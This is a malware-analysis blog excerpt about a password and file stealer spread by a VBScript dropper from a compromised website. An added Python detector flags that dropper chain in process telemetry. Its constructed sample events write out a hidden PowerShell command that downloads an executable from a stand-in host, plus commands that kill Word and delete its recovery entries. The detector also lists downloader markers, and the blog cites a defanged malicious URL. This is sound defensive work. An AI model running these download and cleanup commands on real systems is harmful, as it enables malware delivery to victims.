Infostealer spreading through a compromised website

The Zscaler ThreatLabZ team has uncovered a new password-stealer malware variant being delivered through a compromised website. The payload is compiled to Microsoft Intermediate Language (MSIL) and steals passwords saved by the victim's operating system, browsers, and FTP clients. The payload analyzed in this blog was served from the compromised site dnoymuzik[.]com/wp-content/test/conhost.exe.

Delivery vector

The delivery mechanism is a VBScript that downloads the payload from the compromised website and also downloads a decoy document, so that the victim believes the downloaded files are legitimate. The VBScript performs the following actions:

- Downloads the decoy document
- Terminates the Microsoft Word process
- Downloads the payload through a PowerShell command
- Removes Microsoft Word's document-recovery entries from the registry

Figure 1: Screen capture of VBScript activity

Figure 2: Screen capture of the decoy document

The decoy document poses as a "public service" message from a government organization and contains spam-mitigation instructions.

Once executed, the malware begins its password-stealing routine: it checks for installed antivirus software and enumerates the directories and files from which it will harvest credentials. The most interesting function of this malware is that it also behaves like a file stealer: it enumerates files and folders on the system, searches them for strings of interest, and uploads the matches to the malware's C&C once it grabs the sensitive...
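As an added detection example, not code from the ThreatLabZ analysis, the script below correlates process-creation telemetry into the VBScript dropper chain described under "Delivery vector": a wscript/cscript host whose direct children kill Word, run a PowerShell downloader, and delete Word's recovery entries. It assumes the script carries out each step by spawning a child process (taskkill, powershell, reg); a script that uses WScript.Shell or WMI directly would leave registry and process-termination events instead of child processes. The Word\Resiliency key as the location of the document-recovery entries is my assumption, since the write-up does not name the key, and all events, paths and the example.invalid URL are constructed for illustration.

```python
"""Flag a VBScript dropper chain in process-creation telemetry.

Added detection example; the events below are constructed for illustration
and are not taken from the ThreatLabZ analysis.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (e.g. from Sysmon event ID 1)."""
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Command-line fragments typical of a PowerShell downloader stage.
DOWNLOAD_MARKERS = (
    "downloadfile", "downloadstring", "net.webclient",
    "invoke-webrequest", "iwr ", "start-bitstransfer",
)
# Assumption: Word keeps its document-recovery entries under the
# per-version Word\Resiliency key; the write-up does not name the key.
WORD_RECOVERY_KEY_FRAGMENT = "word\\resiliency"


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_child(ev: ProcEvent) -> Optional[str]:
    """Map one child process to a dropper behaviour, or None if benign."""
    name = image_name(ev.image)
    cmd = ev.cmdline.lower()
    if name == "powershell.exe" and any(m in cmd for m in DOWNLOAD_MARKERS):
        return "powershell_download"
    if name == "taskkill.exe" and "winword" in cmd:
        return "kill_word"
    if name == "reg.exe" and "delete" in cmd and WORD_RECOVERY_KEY_FRAGMENT in cmd:
        return "clear_word_recovery"
    return None


def find_dropper_chains(events: Iterable[ProcEvent],
                        min_behaviours: int = 2) -> Dict[int, Set[str]]:
    """Return {script_host_pid: behaviours} for every wscript/cscript process
    whose direct children show at least min_behaviours dropper behaviours.
    Assumes each step is performed by a child process (see lead-in)."""
    events = list(events)
    children: Dict[int, List[ProcEvent]] = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)

    findings: Dict[int, Set[str]] = {}
    for ev in events:
        if image_name(ev.image) not in SCRIPT_HOSTS:
            continue
        behaviours: Set[str] = set()
        for child in children[ev.pid]:
            label = classify_child(child)
            if label:
                behaviours.add(label)
        if len(behaviours) >= min_behaviours:
            findings[ev.pid] = behaviours
    return findings


# Constructed telemetry: one malicious chain (pid 200), one benign
# PowerShell use by the user (pid 300) and one benign logon script (pid 400).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\Downloads\notice.vbs"'),
    ProcEvent(201, 200, r"C:\Windows\System32\taskkill.exe",
              "taskkill /F /IM WINWORD.EXE"),
    ProcEvent(202, 200,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/test/conhost.exe',"
              "$env:TEMP + '\\conhost.exe')\""),
    ProcEvent(203, 200, r"C:\Windows\System32\reg.exe",
              r'reg delete "HKCU\Software\Microsoft\Office\16.0\Word\Resiliency" /f'),
    ProcEvent(300, 100,
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-Process"),
    ProcEvent(400, 1, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe \\fileserver\netlogon\mapdrives.vbs"),
    ProcEvent(401, 400, r"C:\Windows\System32\net.exe",
              "net use H: \\\\fileserver\\home"),
]


if __name__ == "__main__":
    for pid, behaviours in find_dropper_chains(SAMPLE_EVENTS).items():
        print(f"suspicious script host pid={pid}: {sorted(behaviours)}")
```

Run stand-alone it flags only pid 200; the benign PowerShell and the logon script are left alone because the threshold requires two distinct dropper behaviours under one script host. In practice the input would be Sysmon event ID 1 or EDR process telemetry, and the download markers and recovery-key fragment would be tuned to the environment.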